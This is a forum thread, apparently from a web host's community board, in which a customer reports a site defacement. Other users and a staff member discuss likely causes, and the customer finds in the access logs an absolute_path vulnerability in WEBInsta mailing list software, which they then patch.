Security report #998997 over 24 hours old


#1

I have submitted a detailed report to DH support outlining the defacing of many of my DH hosted sites via a sever exploit. 24+ hours later, no response. With no other means of contacting them, I am posting here in hopes that it will spark a response.

report request #998997


#2

Mind if I ask what the server exploit was? Just wondering if it really was a server exploit because I would think that a lot more would’ve happened beyond simply defacing a web page.


#3

On seven of my ten domains, the index.html or index.php pages’ code was replaced by “RootBox Owns Your Box”. Nothing else was touched. I am the only one with the password to my sites (changed frequently, and of course, changed immediately after the problem was discovered). I only use SSH/SFTP to access the sites, and I only use one of two machines, both of which only I have physical access to. Googling around, I found this link…

http://translate.google.com/translate?hl=en&sl=es&u=http://rumy.blogcindario.com/2005/02/00026.html&prev=/search?q=ownz+rootbox&hl=en&lr=&sa=G

It could very well be the exploit in question, or it could be a coincidence. It’s possible that I did something to make my sites vulnerable to attack/exploit, but I can not see how/where. Short of a reply from DH support, I can only guess. Presumably, DH support could look into the issue and tell me what happened, how it happened, and who was to blame, and whether or not it is an issue or not. You’d think that a security issue is something they would interested in determining if it was serious or not in a timely manner.


#4

most likely a php script you’re running, phpBB and AWstats are a few recently hard hit scripts

[color=#0000CC]jason[/color]


#5

seconding jason, but with not much more to go on, if you have either older, umpatched phpbb or awstats installed on your domains you are vuln to a variety of sql expliots (santy worm, injections, etc). What php scripts are you using? If they are third party, you should probably check out the user forums for those scripts, you will find info about exploits, patching, restoration hints at these boards. If they are home-made scripts, you might want to check out php security forums.

If mod_security is not enabled on your domains, turn it on, should help prevent most future attacks.

Good luck getting everything back in order. I also doubt this was a server-wide issue because if it was, there would be a lot more noise on this board if many users were affected. :wink:


#6

They got back to me, although about 30 hours later :frowning: . DH claim it’s not a server exploit, and I beleive them. But they instead say that it is a CMS php script im using, Geeklog. Oddly, they said “the security expert said it is a vulnerablility in Geeklog and that you should update to the newest version”. Well, I have the newest version installed, 1.3.11, and configured properly. There is no noise about Geeklog 1.3.11 having any security problems, so Im still at a loss. I have no awstats or phpBB running anwhere, and mod_security is enabled on all domains. So, I’m back to crossing my fingers that I dont get hit again. I’ll continue to search through my sites for a vulnerability. I wish DH could supply me the access logs for the time period in question, that would help me determine what the intruders may have done.


#7

you can access the access log your self. Just FTP into your domain, then check out the logs directory.

-Matttail


#8

We have seen a LOT of security exploits on websites like this in the past couple of months. We try to investigate every one of them but most of our support staff are not qualified to do a thorough investigation and the people who are capable of doing it are quite busy.

The majority of these break-ins are due to unpatched software that we have previously made announcements about. In those cases it’s hard for us to commit too much time since we have already done what we can to protect the site before the break-in. It sounds like that may not be the case here, however.

I generally include the problematic URL or query string that as used to crack the website when I send people reports of security holes. I’ll try to get everyone else to do that as well so you have more information to go on.

  • Dallas
  • DreamHost Honcho

#9

Oh man, I never knew they were there. Really silly of me. Off to check the logs…

Ok, checked them. It turns out there’s a securtiy hole in the mailing list manager software i had on one of my sites… WEBInsta ( http://www.webinsta.com ) that has an absolute_path vulnerability. Found it, patched it, and now I’m more secure.

Fun learning experience.